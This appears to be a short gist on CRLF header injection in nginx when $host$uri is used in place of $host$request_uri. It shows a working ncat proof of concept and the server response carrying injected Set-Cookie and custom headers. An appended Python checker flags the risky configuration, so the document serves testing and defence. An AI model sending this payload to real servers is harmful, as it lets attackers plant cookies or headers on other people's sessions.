Created
April 1, 2021 10:47
# Header manipulation through CRLF injection.
# On nginx this happens when $host$uri is used instead of $host$request_uri.
$ echo -e "GET /%0D%0ASet-Cookie: hack%0D%0AX-FoRwArDeDFor: yoram HTTP/1.1\r\nHost: $HOSTNAME\r\n" | \
ncat $HOSTNAME 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 01 Apr 2021 10:15:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20
Location: https://$HOSTNAME/
Set-Cookie: hack
X-FoRwArDeDFor: yoram
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
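
A configuration check for the pattern named in the comments above, added here as an example and not part of the original gist: it flags header-producing nginx directives that interpolate the decoded `$uri` (or its alias `$document_uri`) and prints the line rewritten with `$request_uri`. The function name, the directive list and the sample configuration are assumptions constructed for illustration.

```python
import re

# nginx fills $uri / $document_uri with the percent-decoded, normalized path,
# so %0D%0A in the request line becomes a literal CR LF when interpolated.
DECODED_VARS = re.compile(r"\$(?:\{(?:uri|document_uri)\}|(?:uri|document_uri)\b)")
# Directives whose arguments are written into response or upstream headers
# (assumed list for this example, not exhaustive).
HEADER_DIRECTIVES = {"return", "rewrite", "add_header", "proxy_set_header"}

# Constructed sample configuration (not taken from the gist).
SAMPLE_CONF = """
server {
    listen 80;
    server_name example.test;
    # weak: $uri is decoded before it reaches the Location header
    return 301 https://$host$uri;
}
server {
    listen 80;
    server_name fixed.example.test;
    # corrected: $request_uri keeps the path exactly as the client sent it
    return 301 https://$host$request_uri;
}
"""

def find_decoded_uri_use(conf_text):
    """Return (line_number, directive, candidate_fix) for each risky directive.

    Simplification: one directive per line, and '#' always starts a comment.
    The candidate fix is a starting point for review; $request_uri also
    carries the query string, which $uri does not.
    """
    findings = []
    for number, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and indentation
        if not line:
            continue
        directive = line.split()[0]
        if directive in HEADER_DIRECTIVES and DECODED_VARS.search(line):
            candidate = DECODED_VARS.sub("$request_uri", line)
            findings.append((number, directive, candidate))
    return findings

if __name__ == "__main__":
    for number, directive, candidate in find_decoded_uri_use(SAMPLE_CONF):
        print(f"line {number}: '{directive}' uses decoded $uri; candidate: {candidate}")
```
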